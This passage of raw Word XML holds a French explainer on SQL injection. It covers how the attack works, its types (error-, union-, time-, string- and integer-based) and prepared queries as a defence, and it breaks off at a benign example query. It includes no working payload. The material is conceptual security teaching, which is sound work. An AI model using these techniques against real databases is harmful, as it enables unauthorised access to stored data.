                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="258D1699" w14:textId="35097785" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A8BBD5" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543AA276" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05F5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Le fonctionnement de SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687758AA" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45915CC1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE351D">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Le fonctionnement de SQL Injection repose sur l'utilisation d'instructions SQL malveillantes pour exploiter les vulnérabilités des applications web. Les attaquants peuvent utiliser des chaînes de requêtes SQL malveillantes pour manipuler les requêtes SQL de l'application et récupérer des informations sensibles stockées dans la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A040A3" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42DC95F7" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2371FC2D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A89ECB7" wp14:editId="284B0073">
            <wp:extent cx="5760720" cy="2480945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Image 2" descr="Protégez vous des injections SQL avec R&amp;S®Cloud Prot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tégez vous des injections SQL avec R&amp;S®Cloud Protect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480945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E3FCD9" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5367FB01" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57153DF6" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE351D">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Par exemple, si une application web utilise une requête SQL pour récupérer les noms d'utilisateurs et les mots de passe stockés dans une base de données, un attaquant pourrait insérer une chaîne de requêtes malveillante dans un champ de formulaire de l'application pour récupérer les noms d'utilisateurs et les mots de passe stockés dans la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6F615" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714B7D29" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00FE351D" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="605CF8B1" wp14:editId="69BD91FD">
            <wp:extent cx="5057775" cy="1743907"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="3" name="Image 3" descr="Tout savoir sur la SQL injection | Cloudf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t savoir sur la SQL injection | Cloudfla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1111" cy="1745057"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="780D7F8F" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="38E37FEB" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00C90C04" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAF34AA" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C90C04">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Types de SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E840C82" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE0E49E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve">Les injections SQL sont une technique courante d'exploitation de failles de sécurité dans les applications Web qui utilisent des bases de données. Voici quelques types d'injections SQL courantes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF51F3" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000C0C38" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0C38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injection SQL basée sur les erreurs :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E794DF" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Cette méthode consiste à provoquer des erreurs dans les requêtes SQL pour obtenir des informations sur la base de données, telles que les noms de table et les noms de colonne.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F46EE54" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="1F31D2A7" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000C0C38" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0C38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection SQL basée sur l'union : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556B04BE" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Cette technique consiste à ajouter une instruction UNION à une requête SQL valide pour récupérer des données à partir de tables supplémentaires de la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A1D015" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="2BB86E0D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r w:rsidRPr="000C0C38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injection SQL basée sur les temps :</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0C38">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D62B9F2" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Cette technique consiste à ajouter des instructions SQL qui prennent du temps à s'exécuter pour retarder la réponse du serveur et obtenir des informations sur la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F844EDC" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="01D20E84" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000C0C38" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0C38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection SQL basée sur les chaînes de caractères : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72838117" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Cette méthode consiste à injecter des chaînes de caractères dans les requêtes SQL pour modifier leur comportement et accéder à des données auxquelles l'utilisateur n'est normalement pas autorisé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC56D4" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="209BDD28" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000C0C38" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0C38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection SQL basée sur les entiers : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16800EB7" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Cette technique consiste à injecter des entiers dans les requêtes SQL pour modifier leur comportement et accéder à des données auxquelles l'utilisateur n'est normalement pas autorisé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C14B63" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Il est important de noter que ces techniques ne sont pas exhaustives et qu'il existe d'autres méthodes d'injection SQL. Il est donc crucial de sécuriser les applications Web en appliquant des pratiques de codage sécurisées et en utilisant des bibliothèques et des Framework de sécurité pour prévenir les attaques d'injection SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1775E4B1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D317F8" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4B4B60" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C978A40" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9F9410" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21000959" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19736584" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40B3A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Techniques de SQL Injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A25AF" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F549546" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>L'injection SQL est une technique d'attaque qui permet à un attaquant de prendre le contrôle d'une base de données en insérant des instructions SQL malveillantes dans des entrées utilisateur ou des requêtes Web. Les attaquants utilisent souvent cette technique pour contourner les mécanismes d'authentification et d'autorisation, accéder à des données non autorisées ou corrompre des données dans une base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF6B14" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Il existe plusieurs types d'injections SQL, notamment les injections basées sur l'union, les injections basées sur les commentaires et les injections basées sur les chaînes. Les injections basées sur l'union consistent à ajouter une instruction SQL UNION dans une requête SQL afin de combiner les résultats de deux requêtes. Les injections basées sur les commentaires consistent à ajouter des commentaires SQL dans une requête SQL afin de masquer l'instruction malveillante. Les injections basées sur les chaînes consistent à ajouter des chaînes malveillantes dans une requête SQL afin de tromper le système en exécutant une instruction SQL non souhaitée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEBD780" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t xml:space="preserve">Pour se protéger contre les injections SQL, il est important d'utiliser des paramètres de requête et des requêtes préparées pour éliminer les entrées utilisateurs malveillants. Il est également important de mettre en place des mécanismes d'authentification et d'autorisation solides pour contrôler l'accès à la </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>base de données et de s'assurer que les logiciels et les serveurs sont à jour avec les derniers correctifs de sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB71F71" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00F40B3A" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3E1900" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Injection basée sur l'Union</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48520505" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D975993" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r>
        <w:t>Dans cette méthode, un attaquant utilisant l’union SQL se joint pour afficher les résultats d’une table différente. Par exemple, si un attaquant est sur une page de recherche il peut ajouter les résultats d’un autre tableau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02541E32" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="701703B5" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00107C3E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:left w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
          <w:bottom w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:right w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>post_table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DF622A7" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00107C3E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:left w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
          <w:bottom w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:right w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> id </w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="9A6E3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C40CE" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00107C3E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
